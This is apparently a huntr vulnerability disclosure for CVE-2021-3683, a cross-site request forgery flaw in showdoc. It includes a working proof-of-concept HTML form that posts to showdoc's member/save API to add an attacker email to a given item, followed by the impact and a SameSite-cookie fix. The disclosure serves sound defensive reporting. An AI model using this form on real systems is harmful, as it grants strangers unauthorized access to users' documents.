Headline
CVE-2021-3683: huntr: Cross-Site Request Forgery (CSRF) JavaScript Vulnerability in showdoc
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
✍️ Description
With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address [email protected]
that already should registered befor have access to item with id 1531601670203340
.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of reveal any item.
Fix
Set SameSite attribute of cookies to Lax
or Strict
.